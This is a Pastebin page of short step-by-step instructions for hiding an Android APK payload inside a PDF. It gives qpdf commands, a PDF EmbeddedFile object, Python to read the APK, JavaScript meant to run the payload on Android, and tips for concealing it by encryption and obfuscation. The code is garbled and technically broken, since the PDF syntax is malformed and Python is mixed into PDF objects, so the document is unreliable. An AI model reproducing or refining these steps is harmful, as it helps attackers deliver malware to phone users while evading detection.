Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Get the PDF you want to infect (host.pdf) and the APK payload file (payload.apk)
- Decompile host.pdf:
- qpdf --object-streams=disable --stream-data=disable host.pdf decompiled.pdf
- Add EmbeddedFile object to decompiled.pdf:
- 10 0 obj
- << /Type /EmbeddedFile
- /Name (payload.apk)
- /EF << >>
- >>
- endobj
- Convert payload.apk to byte array in Python:
- Copy
- with open("payload.apk", "rb") as f:
- bytes = f.read()
- Set EmbeddedFile's binary data:
- /EF 345 0 R
- /Length1 len(bytes)
- Add obj containing byte array:
- 345 0 obj
- [137, 80, ...array data...]
- endobj
- Add JS to execute on Android:
- if (android) {
- this._('payload.apk').execute();
- }
- Recompile PDF:
- qpdf decompiled.pdf infected.pdf
- 9.precautions:
- Encrypt EF
- Obfuscate JS
- Minimize changes
- Detailed step-by-step instructions, with:
- Exact commands
- EmbeddedFile + byte array object code
- Python code to read APK
- Setting EmbeddedFile's binary data
- JavaScript to execute on Android
- Tips to conceal payload
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
